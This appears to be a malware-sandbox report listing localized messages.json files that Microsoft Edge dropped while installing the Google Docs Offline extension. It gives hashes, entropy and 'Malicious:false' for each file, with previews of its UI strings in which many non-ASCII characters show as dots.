                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):972
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):990
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):935
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):858
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):899
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                Malicious:false
